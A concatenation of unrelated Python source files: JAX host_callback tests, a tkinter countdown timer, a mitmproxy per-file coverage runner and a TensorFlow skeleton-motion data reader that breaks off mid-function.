def jax_outside_vjp_fun(arg_and_ct):
arg, ct = arg_and_ct
_, f_vjp = jax.vjp(jax_outside_fun, arg)
ct_in, = f_vjp(ct)
return ct_in
return (call_jax_other_device(jax_outside_vjp_fun, (arg, ct_res), device=device),)
make_call.defvjp(make_call_vjp_fwd, make_call_vjp_bwd)
return make_call(arg)
class CallJaxTest(jtu.JaxTestCase):
"""Tests using `call_jax_other_device`."""
def setUp(self):
if jtu.device_under_test() == "gpu" and jax.device_count() > 1:
raise SkipTest("host_callback broken on multi-GPU platforms (#6447)")
if jtu.device_under_test() != "cpu":
assert jax.devices("cpu")
self.outside_device = jax.devices("cpu")[0]
else:
if len(jax.devices("cpu")) == 1:
raise SkipTest("Test needs at least two devices. On CPU use XLA_FLAGS=--xla_force_host_platform_device_count=2")
self.outside_device = jax.devices("cpu")[1]
super().setUp()
def test_jax_impl(self):
def f_jax(x):
return jnp.sin(x)
def f_outside(x):
return call_jax_other_device(f_jax, x, device=self.outside_device)
self.assertAllClose(f_jax(3.), f_outside(3.))
self.assertAllClose(f_jax(3.), jax.jit(f_outside)(3.))
def test_jax_impl_pytree(self):
def f_jax(x):
# x : dict(a=..., b=...) and output is a list of two elements
return [jnp.sin(x["a"]), jnp.sin(x["b"])]
def f_outside(x):
return call_jax_other_device(f_jax, x, device=self.outside_device)
x = dict(a=3., b=4.)
res_jax = f_jax(x)
# print(f"outside_jaxpr = {jax.make_jaxpr(f_outside)(x)}")
res_outside = f_outside(x)
self.assertAllClose(res_jax, res_outside)
def test_jax_grad(self):
def f_jax(x):
return 2. * jnp.sin(x)
def f_outside(x):
return 2. * call_jax_other_device(jnp.sin, x, device=self.outside_device)
res_jax = jax.grad(f_jax)(3.)
self.assertAllClose(res_jax, jax.grad(f_outside)(3.))
def test_jax_grad_pytree(self):
def f_jax(x):
# x : dict(a=..., b=...) and output is a float
return 3. * jnp.sin(x["a"]) + jnp.sin(x["b"])
def f_outside(x):
return call_jax_other_device(f_jax, x, device=self.outside_device)
x = dict(a=3., b=4.)
res_jax = jax.grad(f_jax)(x)
self.assertAllClose(res_jax, jax.grad(f_outside)(x))
def test_jax_grad_of_grad(self):
def f_jax(x):
return 2. * x * x * x
def f_outside(x):
return 2. * call_jax_other_device(lambda x: x * x * x, x, device=self.outside_device)
res_jax = jax.grad(jax.grad(f_jax))(5.)
res_outside = jax.grad(jax.grad(f_outside))(5.)
self.assertAllClose(res_jax, res_outside)
class OutfeedRewriterTest(jtu.JaxTestCase):
def setUp(self):
if jtu.device_under_test() == "gpu" and jax.device_count() > 1:
raise SkipTest("host_callback broken on multi-GPU platforms (#6447)")
super().setUp()
def assertRewrite(self, expected: str, func: Callable, args: Sequence,
has_input_token=True, has_output_token=True):
"""Check that the rewrite of func(*args) matches expected."""
jaxpr = jax.make_jaxpr(func)(*args)
rewritten = hcb._rewrite_closed_jaxpr(jaxpr, # noqa: F841
has_input_token, has_output_token)
# Since it is somewhat annoying to update the Jaxpr assertions when we change
# the Jaxpr printing, we do not check these by default. It is recommended that
# before making changes to the code generation and Jaxpr rewriting, turn on
# the checking, update the expected Jaxpr, and then make the changes.
# assertMultiLineStrippedEqual(self, expected, str(rewritten))
del rewritten
def test_no_outfeed(self):
self.assertRewrite("""
{ lambda ; a.
let b = mul a a
c = add a b
in (c,) }""", lambda x: x + x * x, [0], has_input_token=False,
has_output_token=False)
self.assertRewrite("""
{ lambda ; a d e.
let b = mul a a
c = add a b
in (c,) }""", lambda x: x + x * x, [0], has_output_token=False)
self.assertRewrite("""
{ lambda ; a d e.
let b = mul a a
c = add a b
in (c, d, e) }""", lambda x: x + x * x, [0])
def test_simple_outfeed(self):
self.assertRewrite("""
{ lambda ; a d e.
let b = add a a
c f g = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] b d e
in (c, f, g) }""", lambda x: hcb.id_print(x + x), [0])
def test_simple_outfeed_without_input_token(self):
self.assertRewrite("""
{ lambda ; a b.
let e = create_token a b
f = create_token a b
c = add a b
d g h = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] c e f
in (d,) }""", lambda x1, x2: hcb.id_print(x1 + x2), [1, 2],
has_input_token=False, has_output_token=False)
def test_simple_outfeed_without_input_token_nor_invars(self):
self.assertRewrite("""
{ lambda ; .
let b = create_token
c = create_token
a d e = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] 42 b c
in (a,) }""", lambda: hcb.id_print(42), [],
has_input_token=False, has_output_token=False)
def test_multiple_tap_without_dependencies(self):
def f(x):
hcb.id_print(x, what="x")
hcb.id_print(x + 1, what="x + 1")
return 2
self.assertRewrite("""
{ lambda ; a c d.
let _ e f = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] a c d
b = add a 1
_ g h = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] b e f
in (2, g, h) }""", f, [1])
def test_cond(self):
y = jnp.ones(5) # captured const
def func(x, z):
return lax.cond(z > 0, (1, 2), lambda a: (a[0], jnp.zeros(5)),
z, lambda a: (hcb.id_print(a), y))
self.assertRewrite("""
{ lambda a ; b c h i.
let d = gt c 0
e = convert_element_type[ new_dtype=int32 ] d
f g j k =
cond[ branches=( { lambda ; a b c d f g.
let e h i = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] d f g
in (e, a, h, i) }
{ lambda ; f_ a b c g h.
let d = broadcast_in_dim[ broadcast_dimensions=( )
shape=(5,) ] 0.00
in (a, d, g, h) } )
linear=(False, False, False, False, False, False) ] e a 1 2 c h i
in (f, g, j, k) }""", func, [y, 5])
def test_while(self):
ct_body = jnp.ones(5, np.float32) # captured const for the body
ct_cond = jnp.ones(5, np.float32) # captured const for the conditional
def func(x):
# x: f32[5]
# c: (f32[5], f32)
return lax.while_loop(lambda c: c[1] < jnp.sum(c[0] + ct_cond),
lambda c: (ct_body, hcb.id_print(c[1]) + 1.),
(x, np.float32(1.)))
self.assertRewrite("""
{ lambda a b ; c f g.
let d e h i =
while[ body_jaxpr={ lambda ; a b c f g.
let d h i = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] c f g
e = add d 1.00
in (a, e, h, i) }
body_nconsts=1
cond_jaxpr={ lambda ; a b c g h.
let d = add b a
e = reduce_sum[ axes=(0,) ] d
f = lt c e
in (f,) }
cond_nconsts=1 ] a b c 1.00 f g
in (d, e, h, i) }""", func, [ct_body])
def test_while_pred_outfeed(self):
"""A while with outfeed in the pred."""
ct_body = jnp.ones(5) # captured const for the body
ct_cond = jnp.ones(2) # captured const for the conditional
def func(x):
return lax.while_loop(lambda c: hcb.id_print(ct_cond, result=c[1]) < 5,
lambda c: (ct_body, hcb.id_print(c[1]) + 1),
(x, 1))
self.assertRewrite("""
{ lambda a b ; c f g.
let j k l = xla_call[ call_jaxpr={ lambda ; a b c g h.
let d i j = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] a g h
e = id_tap_dep c d
f = lt e 5
in (f, i, j) }
donated_invars=(False, False, False, False, False)
name=cond_before ] a c 1 f g
bf d e h i =
while[ body_jaxpr={ lambda ; r s t u v w x.
let y z ba bb =
xla_call[ call_jaxpr={ lambda ; a b c f g.
let d h i = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] c f g
e = add d 1
in (a, e, h, i) }
donated_invars=(False, False, False, False, False)
name=body ] s u v w x
bc bd be =
xla_call[ call_jaxpr={ lambda ; a b c g h.
let d i j = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] a g h
e = id_tap_dep c d
f = lt e 5
in (f, i, j) }
donated_invars=(False, False, False, False, False)
name=cond_body ] r y z ba bb
in (bc, y, z, bd, be) }
body_nconsts=2
cond_jaxpr={ lambda ; m n o p q.
let
in (m,) }
cond_nconsts=0 ] a b j c 1 k l
in (d, e, h, i) }""", func, [ct_body])
def test_scan(self):
y = jnp.ones(5) # captured const
def func(x):
return lax.scan(lambda c, a: (hcb.id_print(c), y), (1, 2), x)
self.assertRewrite("""
{ lambda a ; b f g.
let c d h i e =
scan[ jaxpr={ lambda ; a b c g h d.
let e f i j =
outside_call[ arg_treedef=PyTreeDef(tuple, [*,*])
callback=...
has_token=True
identity=True ] b c g h
in (e, f, i, j, a) }
length=5
linear=(False, False, False, False, False, False)
num_carry=4
num_consts=1
reverse=False
unroll=1 ] a 1 2 f g b
in (c, d, e, h, i) }""", func, [y])
def test_scan_custom_jvp(self):
"""custom JVP, inside scan.
This exercises the custom_jvp_call_jaxpr primitives."""
@jax.custom_jvp
def f(x):
return x * hcb.id_print(x)
@f.defjvp
def f_jvp(primals, tangents):
x, = primals
x_dot, = tangents
primal_out = f(x)
tangent_out = 3. * x * hcb.id_print(x_dot)
return primal_out, tangent_out
def g(x):
# Sum f(x_i)
return lax.scan(lambda carry, inp: (carry + f(inp), 0.),
np.full(x.shape[1:], 0.), # Like x w/o leading dim
x)[0]
arg = np.full((5,), 0.7)
self.assertRewrite("""
{ lambda ; a c d.
let b e f _ =
scan[ jaxpr={ lambda ; a e f b.
let c g h = custom_jvp_call_jaxpr[ fun_jaxpr={ lambda ; a d e.
let b f g = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] a d e
c = mul a b
in (c, f, g) }
num_consts=0 ] b e f
d = add a c
in (d, g, h, 0.00) }
length=5
linear=(False, False, False, False)
num_carry=3
num_consts=0
reverse=False
unroll=1 ] 0.00 c d a
in (b, e, f) }""", g, [arg])
self.assertRewrite("""
{ lambda ; a d e.
let _ _ f g _ b =
scan[ jaxpr={ lambda ; a b h i c d.
let e j k = custom_jvp_call_jaxpr[ fun_jaxpr={ lambda ; a d e.
let b f g = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] a d e
c = mul a b
in (c, f, g) }
num_consts=0 ] c h i
f = add a e
g = mul c 3.00
in (f, *, j, k, 0.00, g) }
length=5
linear=(False, True, False, False, False, True)
num_carry=4
num_consts=0
reverse=False
unroll=1 ] 0.00 * d e a *
_ _ h i _ c =
scan[ jaxpr={ lambda ; a b g h c d.
let e = mul b d
f i j = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True
transforms=(('transpose',),) ] e g h
in (*, b, i, j, *, f) }
length=5
linear=(True, True, False, False, True, False)
num_carry=4
num_consts=0
reverse=True
unroll=1 ] * 1.00 f g * b
in (c, h, i) }""", jax.grad(g), [arg])
def test_scan_custom_vjp(self):
"""custom VJP, inside scan.
This exercises the custom_vjp_call_jaxpr primitives."""
@jax.custom_vjp
def f(x):
return x * hcb.id_print(x)
# f_fwd: a -> (b, residual)
def f_fwd(x):
return f(x), 3. * x
# f_bwd: (residual, CT b) -> [CT a]
def f_bwd(residual, ct_b):
return residual * hcb.id_print(ct_b),
f.defvjp(f_fwd, f_bwd)
def g(x):
# Sum f(x_i)
return lax.scan(lambda carry, inp: (carry + f(inp), 0.),
np.full(x.shape[1:], 0.), # Like x w/o leading dim
x)[0]
arg = np.full((2,), 0.7)
self.assertRewrite("""
{ lambda ; a c d.
let b e f _ =
scan[ jaxpr={ lambda ; a e f b.
let c g h = custom_vjp_call_jaxpr[
fun_jaxpr={ lambda ; a d e.
let b f g = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] a d e
c = mul a b
in (c, f, g) }
num_consts=0
] b e f
d = add a c
in (d, g, h, 0.00) }
length=2
linear=(False, False, False, False)
num_carry=3
num_consts=0
reverse=False
unroll=1 ] 0.00 c d a
in (b, e, f) }""", g, [arg])
self.assertRewrite("""
{ lambda ; a d e.
let _ _ f g _ b =
scan[ jaxpr={ lambda ; a b h i c d.
let e j k = custom_vjp_call_jaxpr[
fun_jaxpr={ lambda ; a d e.
let b f g = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] a d e
c = mul a b
in (c, f, g) }
num_consts=0
] c h i
f = add a e
g = mul c 3.00
in (f, *, j, k, 0.00, g) }
length=2
linear=(False, True, False, False, False, True)
num_carry=4
num_consts=0
reverse=False
unroll=1 ] 0.00 * d e a *
_ _ h i _ c =
scan[ jaxpr={ lambda ; a b g h c d.
let e i j = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] b g h
f = mul d e
in (*, b, i, j, *, f) }
length=2
linear=(True, True, False, False, True, False)
num_carry=4
num_consts=0
reverse=True
unroll=1 ] * 1.00 f g * b
in (c, h, i) }""", jax.grad(g), [arg])
def test_remat_loop(self):
def f(k, x):
x = hcb.id_print(k + x)
return -k * x
def loss(k):
return lax.fori_loop(0, 1, jax.remat(f), k)
self.assertRewrite("""
{ lambda ; a c d.
let _ _ b e f =
while[ body_jaxpr={ lambda ; a b c f g.
let d = add a 1
e h i = remat_call[ call_jaxpr={ lambda ; a b g h.
let c = add a b
d i j = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] c g h
e = neg a
f = mul e d
in (f, i, j) }
concrete=False
name=f ] a c f g
in (d, b, e, h, i) }
body_nconsts=0
cond_jaxpr={ lambda ; a b c e f.
let d = lt a b
in (d,) }
cond_nconsts=0 ] 0 1 a c d
in (b, e, f) }""", loss, [2])
def test_named_call(self):
def tap_scalar(init, do_print=False):
@partial(jax.named_call, name="step")
def step(acc, step_nr):
acc = acc + step_nr
maybe_print(do_print, step_nr, what="step_nr")
return acc, None
return lax.scan(step, init, np.arange(2, dtype=np.int32))
self.assertRewrite("""
{ lambda a ; b d e.
let c = scan[ jaxpr={ lambda ; a b.
let c = named_call[ call_jaxpr={ lambda ; a b.
let c = add a b
in (c,) }
name=step ] a b
in (c,) }
length=2
linear=(False, False)
num_carry=1
num_consts=0
reverse=False
unroll=1 ] b a
in (c, d, e) }""", tap_scalar, [np.int32(3)])
def test_pmap(self):
def f(xv):
jax.pmap(lambda x: jnp.sin(hcb.id_print(x, tap_with_device=True)),
axis_name="i")(xv)
self.assertRewrite("""
{ lambda ; a b c.
let _ d e = xla_pmap[ axis_name=i
axis_size=1
backend=None
call_jaxpr={ lambda ; a d e.
let b f g = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] a d e
c = sin b
in (c, f, g) }
devices=None
donated_invars=(False, False, False)
global_arg_shapes=(None,)
global_axis_size=None
in_axes=(0, 0, 0)
name=<lambda>
out_axes=(0, 0, 0) ] a b c
in (d, e) }""", f, [np.array([2.], dtype=np.float32)])
if __name__ == "__main__":
absltest.main(testLoader=jtu.JaxTestLoader())
|
app_timer.py | import tkinter
import playsound
import threading
from tkinter.constants import DISABLED, NORMAL
class AppEntry:
def __init__(self, root):
self.st_min = tkinter.StringVar(value="01")
self.st_sec = tkinter.StringVar(value="00")
self.ent_min = tkinter.Entry(root, textvariable=self.st_min)
self.ent_sec = tkinter.Entry(root, textvariable=self.st_sec)
self.ent_min.config(width=10)
self.ent_sec.config(width=10)
self.st_min.trace("w", lambda *args: self.max_chars())
self.st_sec.trace("w", lambda *args: self.max_chars())
def max_chars(self):
if len(self.st_min.get()) > 2:
self.st_min.set(self.st_min.get()[-1])
elif len(self.st_sec.get()) > 2:
self.st_sec.set(self.st_sec.get()[-1])
class AppTimer:
def __init__(self, root, frame):
self.min = 0
self.sec = 0
self.on = 0
self.sound = False
self.ent = AppEntry(frame)
self.b_start = tkinter.Button(frame, text="start", fg="black", bd=3, command=self.timer)
self.b_reset = tkinter.Button(frame, text="stop", fg="black", bd=3, command=self.reset)
self.lbl = tkinter.Label(frame, text="00:00", font=("", 30))
self.err = tkinter.Label(frame, text="")
def reset(self):
if self.on != 0:
self.on = 2
self.sound = False
def check_in_err(self, min, sec):
if min > 59 or sec > 59:
return -1
if min < 0 or sec < 0:
return -1
return 0
def in_user(self):
if self.on == 1:
return 0
min = self.ent.ent_min.get()
sec = self.ent.ent_sec.get()
if len(min) == 0 or len(sec) == 0:
return -1
if not min.isdigit() or not sec.isdigit():
return -1
min = int(min)
sec = int(sec)
if self.check_in_err(min, sec) != 0:
self.err.config(text="minutes and seconds should be in 0-59")
return -1
self.min = int(min)
self.sec = int(sec)
self.on = True
return 0
def text_format(self, min, sec):
st = ""
if min < 10:
st += "0{0}:".format(min)
else:
st += "{0}:".format(min)
if sec < 10:
st += "0{0}".format(sec)
else:
st += "{0}".format(sec)
return st
def alarm_on(self):
while self.sound:
playsound.playsound("libs/Alarm-clock-bell-ringing-sound-effect.mp3")
self.b_start["state"] = NORMAL
def timer(self):
if self.on == 2:
self.on = 0
self.b_start["state"] = NORMAL
return 1
if self.in_user() != 0:
return -1
self.b_start["state"] = DISABLED
self.lbl.config(text=self.text_format(self.min, self.sec))
if self.min != -1 and self.on == 1:
if self.sec == 0:
self.min -= 1
self.sec = 59
self.lbl.after(1000, self.timer)
else:
self.sec -= 1
self.lbl.after(1000, self.timer)
else:
self.on = 0
self.sound = True
self.lbl.config(text="00:00")
th = threading.Thread(target=self.alarm_on)
th.start()
return 0
|
individual_coverage.py | #!/usr/bin/env python3
import io
import contextlib
import os
import sys
import glob
import multiprocessing
import configparser
import itertools
import pytest
def run_tests(src, test, fail):
stderr = io.StringIO()
stdout = io.StringIO()
with contextlib.redirect_stderr(stderr):
with contextlib.redirect_stdout(stdout):
e = pytest.main([
'-qq',
'--disable-pytest-warnings',
'--no-faulthandler',
'--cov', src.replace('.py', '').replace('/', '.'),
'--cov-fail-under', '100',
'--cov-report', 'term-missing:skip-covered',
test
])
if e == 0:
if fail:
print("UNEXPECTED SUCCESS:", src, "Please remove this file from setup.cfg tool:individual_coverage/exclude.")
e = 42
else:
print("SUCCESS: ", src)
else:
if fail:
print("IGNORING FAIL: ", src)
e = 0
else:
cov = [l for l in stdout.getvalue().split("\n") if (src in l) or ("was never imported" in l)]
if len(cov) == 1:
print("FAIL: ", cov[0])
else:
print("FAIL: ", src, test, stdout.getvalue(), stdout.getvalue())
print(stderr.getvalue())
print(stdout.getvalue())
sys.exit(e)
def start_pytest(src, test, fail):
# run pytest in a new process, otherwise imports and modules might conflict
proc = multiprocessing.Process(target=run_tests, args=(src, test, fail))
proc.start()
proc.join()
return (src, test, proc.exitcode)
def main():
c = configparser.ConfigParser()
c.read('setup.cfg')
fs = c['tool:individual_coverage']['exclude'].strip().split('\n')
no_individual_cov = [f.strip() for f in fs]
excluded = ['mitmproxy/contrib/', 'mitmproxy/test/', 'mitmproxy/tools/', 'mitmproxy/platform/']
src_files = glob.glob('mitmproxy/**/*.py', recursive=True) + glob.glob('pathod/**/*.py', recursive=True)
src_files = [f for f in src_files if os.path.basename(f) != '__init__.py']
src_files = [f for f in src_files if not any(os.path.normpath(p) in f for p in excluded)]
ps = []
for src in sorted(src_files):
test = os.path.join("test", os.path.dirname(src), "test_" + os.path.basename(src))
if os.path.isfile(test):
ps.append((src, test, src in no_individual_cov))
result = list(itertools.starmap(start_pytest, ps))
if any(e != 0 for _, _, e in result):
sys.exit(1)
pass
if __name__ == '__main__':
main()
|
skeleton_reader_standardize.py | import fnmatch
import os
import re
import threading
import librosa
import numpy as np
import tensorflow as tf
def normalizationStats(completeData):
data_mean = np.mean(completeData, axis=0)
data_std = np.std(completeData, axis=0)
# dimensions_to_ignore = []
# if not full_skeleton:
# dimensions_to_ignore = [0,1,2,3,4,5]
# dimensions_to_ignore.extend(list(np.where(data_std < 1e-4)[0]))
'''Returns the mean of data, std, and dimensions with small std. Which we later ignore. '''
return data_mean, data_std
def normalizeTensor(inputTensor, data_mean, data_std):
meanTensor = data_mean.reshape((1, 1, inputTensor.shape[2]))
meanTensor = np.repeat(meanTensor, inputTensor.shape[0], axis=0)
meanTensor = np.repeat(meanTensor, inputTensor.shape[1], axis=1)
stdTensor = data_std.reshape((1, 1, inputTensor.shape[2]))
stdTensor = np.repeat(stdTensor, inputTensor.shape[0], axis=0)
stdTensor = np.repeat(stdTensor, inputTensor.shape[1], axis=1)
normalizedTensor = np.divide((inputTensor - meanTensor), stdTensor)
return normalizedTensor
# prepare data for training from csv files.
# each csv file contain N x 45 parentToChildVect for one subject
# data prepared as list of length N, with each element a T x 42 matrix (without root) or T x 45 matrix (with root)
# T = len_sample, N = num_sample
# len_samples == chunk length
def sample_data(input_data, len_samples, bWithRoot, bDiffRootLoc):
overall_sampled_data = []
# i = 0;
window_shift = 25
tempStartFrame = 0
while tempStartFrame + len_samples + 1 < input_data.shape[0]:
# if (i+1)*(len_samples+1) >= input_data.shape[0]:
# break
s_t = tempStartFrame
e_t = tempStartFrame + len_samples + 1
if bWithRoot:
sample_data = np.copy(input_data[s_t:e_t, :]) # should make a copy instead of aliasing
# sample_data[:, 0:3] = sample_data[:, 0:3]/100;
# sample_data[:, 1:3] = sample_data[:, 1:3]/100;
else:
sample_data = input_data[s_t:e_t, 3:] # (W+1) x dim
if bWithRoot and bDiffRootLoc:
initRoot = sample_data[0, 0:3];
initRoot = np.tile(initRoot, (sample_data.shape[0], 1))
sample_data[:, 0:3] = sample_data[:, 0:3] - initRoot;
# print np.max(sample_data[:, 1])
if not np.isnan(np.max(sample_data)):
overall_sampled_data.append(sample_data)
# print 'Nan is detected, but ignored'
# else:
# overall_data.append([class_ids[x] fddor x in sample_text])
# i = i + 1
tempStartFrame = tempStartFrame + window_shift
initLength = len(overall_sampled_data)
finalLength = initLength
if bAugRootLoc:
overall_sampled_data = AugmentRootLocation(overall_sampled_data)
finalLength = len(overall_sampled_data)
print ('chunkNum: %d -> %d' % (initLength, finalLength))
return overall_sampled_data
# with rotation normalization such that first frame of each chunk faces z direction (0,0,1)
'''
def sample_data_rotNom(input_data, len_samples, bWithRoot, bDiffRootLoc):
overall_sampled_data = []
# i = 0;
window_shift = 25
tempStartFrame = 0
while tempStartFrame + len_samples + 1 < input_data.shape[0]:
# if (i+1)*(len_samples+1) >= input_data.shape[0]:
# break
s_t = tempStartFrame
e_t = tempStartFrame + len_samples + 1
if bWithRoot:
sample_data = np.copy(input_data[s_t:e_t, :]) # should make a copy instead of aliasing
# sample_data[:, 0:3] = sample_data[:, 0:3]/100;
# sample_data[:, 1:3] = sample_data[:, 1:3]/100;
else:
sample_data = input_data[s_t:e_t, 3:] # (W+1) x dim
if bWithRoot and bDiffRootLoc:
initRoot = sample_data[0, 0:3];
initRoot = np.tile(initRoot, (sample_data.shape[0], 1))
sample_data[:, 0:3] = sample_data[:, 0:3] - initRoot;
# Apply rotation normalization
sample_data_3d = sample_data.reshape(sample_data.shape[0], sample_data.shape[1] / 3, 3); # 101x15x3
rot2z = input_data_rot2Z[s_t, :]; # 1x9
rot2z = rot2z.reshape(3, 3);
rot2z = rot2z.transpose(); # 3x3...Not sure transpose is needed.. should check
for i in np.arange(0, sample_data_3d.shape[0]):
tempPose = sample_data_3d[i, :, :]; # 15x3
tempPose = tempPose.transpose() # 3x15
tempPose = np.dot(rot2z, tempPose); # 3x15 , rotated
sample_data_3d[i, :, :] = tempPose.transpose();
sample_data = sample_data_3d.reshape(sample_data.shape[0], sample_data.shape[1]);
# print np.max(sample_data[:, 1])
if not np.isnan(np.max(sample_data)):
overall_sampled_data.append(sample_data)
# print 'Nan is detected, but ignored'
# else:
# overall_data.append([class_ids[x] fddor x in sample_text])
# i = i + 1
tempStartFrame = tempStartFrame + window_shift
initLength = len(overall_sampled_data)
finalLength = initLength
if bAugRootLoc:
overall_sampled_data = AugmentRootLocation(overall_sampled_data)
finalLength = len(overall_sampled_data)
print ('chunkNum: %d -> %d' % (initLength, finalLength))
return overall_sampled_data
'''
def sample_data_rotNom(input_data, len_samples, bWithRoot, bDiffRootLoc):
overall_data = []
i = 0
while (i + 1) * (len_samples + 1) < input_data.shape[0]:
# if (i+1)*(len_samples+1) >= input_data.shape[0]:
# break
s_t = int(i * len_samples)
e_t = int((i + 1) * len_samples + 1)
sample = input_data[s_t:e_t, :]
sample[1:, :3] = sample[1:, :3] - sample[:-1, :3]
sample[0, :3] = 0
'''update: keep root location but calculate the relative change. Always make the first frame of each chunk at center of the dome.'''
'''sample data is of size len_sample x 42. Normalize the chunk so that the first frame is always facing the same direction
reshape to len_sample x 15 x 3'''
sample_reshape = sample.reshape((sample.shape[0], 15, 3))
shoulder = sample_reshape[0,3,:] - sample_reshape[0,9,:]
shoulder[1] = 0
shoulder = shoulder/np.linalg.norm(shoulder)
R = np.array([[shoulder[2], 0, -shoulder[0]], [0, 1, 0], [shoulder[0], 0, shoulder[2]]])
#print 'R det:{0}'.format(np.linalg.det(R))
#print 'R.T - inv(R)={0}'.format(R.T - np.linalg.inv(R))
sample_reshape = np.dot(sample_reshape, R.T)
sample_out = sample_reshape.reshape((sample_reshape.shape[0], 45))
overall_data.append(sample_out)
i = i + 1
# overall_data = np.array(overall_data,dtype=np.float64)
# train_data = overall_data[:,:-1,3:]
# label_data = overall_data[:,1:,3:]
return overall_data
def createTrain(datadir, num_samples=1000, len_samples=25,
bWithRoot=0, data_mean=None, data_std=None, testingSeq=None,
bDiffRootLoc=0, bNormRootRot=0):
overall_data = []
completeRawData = []
for scene in os.listdir(datadir):
# if len(overall_data) > num_samples:
# break
subjects = os.listdir(os.path.join(datadir, scene))
print('scene {0} has {1} subjects'.format(scene, len(subjects)))
for sub in subjects:
filename = os.path.join(datadir, scene, sub)
if os.path.isdir(filename) == True or sub[-1] == 'z':
continue
if sub[-1] == 'z': # rotation file
continue
bSkip = False
if testingSeq is not None:
testSeqNum = len(testingSeq) / 2
for i in range(0, testSeqNum, 2):
if testingSeq[i] == scene and testingSeq[i + 1] == sub:
print ('Skip test data: %s' % filename)
bSkip = True
break
if bSkip == True:
break
if bSkip == True:
continue
overall_data_sub= createTrainSubject(filename, len_samples, bWithRoot, bDiffRootLoc, bNormRootRot)
if overall_data_sub is None:
continue
overall_data.extend(overall_data_sub)
# completeRawData.extend(rawData_sub ) #do not use this anymore
# if (len(overall_data)>num_samples):
# overall_data = overall_data[:num_samples]
# break
# print('training_data: {0} distinct samples in total'.format(len(overall_data)))
overall_data = np.array(overall_data, dtype=np.float32) # (chunkNum, chunkLeng+1, dim)
overall_data = np.swapaxes(overall_data, 0, 1) # (chunkLeng+1, chunkNum, dim), e.g.,(101, 5307, 45)
train_data = overall_data[:-1, :, :]
#label_data = overall_data[1:, :, :]
overall_data_2d = overall_data.reshape(overall_data.shape[0] * overall_data.shape[1], overall_data.shape[2])
if np.isnan(np.max(overall_data_2d)):
print ('Warning!!!: completeRawData:: Nan is detected.')
else:
print ('Good!: completeRawData:: Nan is not detected.')
if (data_mean is None) and (data_std is None):
data_mean, data_std = normalizationStats(overall_data_2d)
train_data = normalizeTensor(train_data, data_mean, data_std)
#label_data = normalizeTensor(label_data, data_mean, data_std)
#return train_data, label_data, data_mean, data_std
return train_data, data_mean, data_std
def createTrainSubject(filename, len_samples, bWithRoot, bDiffRootLoc, bNormRootRot):
raw_data = np.loadtxt(filename, delimiter=',')
print ('frame_length: %d' % raw_data.shape[0])
if raw_data.shape[0] < 100:
return None, None
if np.isnan(np.max(raw_data)):
print ('Warning: Nan is detected: {0}'.format(filename))
# input_data2 = np.genfromtxt(filename, delimiter=',')
# print '{1} frames in subject {0}'.format(os.path.basename(filename), raw_data.shape[0])
# [train_data,label_data] = sample_data(input_text,num_samples,len_samples,class_ids)
#todo: what is this bNormRootRot doing? change to diff of root location and rotating according to first frame
if bNormRootRot:
#filename_rot2z = filename + '_rot2z'
#rot2z_data = np.loadtxt(filename_rot2z, delimiter=',')
#if (raw_data.shape[0] != rot2z_data.shape[0]):
# print ("Error: raw_data.shape[0] != rot2z_data.shape[0] (%d != %d)" % (
# raw_data.shape[0], rot2z_data.shape[0]))
# return None, None
overall_sampled_data = sample_data_rotNom(raw_data, len_samples, bWithRoot, bDiffRootLoc)
else:
overall_sampled_data = sample_data(raw_data, len_samples, bWithRoot, bDiffRootLoc)
# train_data = np.swapaxis(train_data, 0, 1)
# label_data = np.swapaxis(label_data, 0, 1)
# dim = T x N x 45
return overall_sampled_data
class SkeletonReader(object):
'''Generic background audio reader that preprocesses audio files
and enqueues them into a TensorFlow queue.'''
def __init__(self,
skeleton_dir,
coord,
sample_size=None,
queue_size=256):
self.skeleton_dir = skeleton_dir
self.coord = coord
self.sample_size = sample_size
self.threads = []
#sample placeholder shape in audio data = n x 1, where n is length of sample points in an audio fragment.
#self.sample_placeholder = tf.placeholder(dtype=tf.float32, shape=None)
#taking into one sample of size (T x 42), where T is unknown before time
self.sample_placeholder = tf.placeholder(dtype=tf.float32, shape=(sample_size, 42))
self.queue = tf.RandomShuffleQueue(capacity=queue_size,
min_after_dequeue=10,
dtypes=['float32'],
shapes=[(sample_size, 42)])
self.enqueue = self.queue.enqueue([self.sample_placeholder])
# TODO Find a better way to check this.
# Checking inside the AudioReader's thread makes it hard to terminate
# the execution of the script, so we do it in the constructor for now.
#if not find_files(skeleton_dir):
# raise ValueError("No skeleton files found in '{}'.".format(skeleton_dir))
def dequeue(self, num_elements):
output = self.queue.dequeue_many(num_elements)
#symbolic dequeue... cannot check dimension before run
#print('shape of output:{0}'.format(output.get_shape()))
#print('content of output:{0}'.format(output))
return output
def thread_main(self, sess):
#buffer_ = np.array([])
stop = False
#Go through the dataset multiple times
#train_data: N x T x skeletonDim tensor. N: number of chunks. T: length of sample
[train_data, data_mean, data_std] = createTrain(datadir, num_samples=1000, len_samples=self.sample_size,
bWithRoot=1, data_mean=None, data_std=None, testingSeq=None,
bDiffRootLoc=1, bNormRootRot=1)
while not stop:
#todo: first aggregate all training samples into a tensor and do standardization
#todo: then use while loop to iterate through all samples multiple times
#output: a tensor of all training data
#iterator = load_generic_skeleton(self.skeleton_dir)
#for skeleton, filename in iterator:
for index in range(train_data.shape[0]):
if self.coord.should_stop():
stop = True
break
#if self.sample_size:
# Cut samples into fixed size pieces
#buffer_ = np.append(buffer_, skeleton)
#while skeleton.shape[0] > self.sample_size:
#todo: need to standardize the data and add root location
#piece = skeleton[:self.sample_size,3:]
piece = train_data[index, :, :]
#print('shape of piece: {0}'.format(piece.shape))
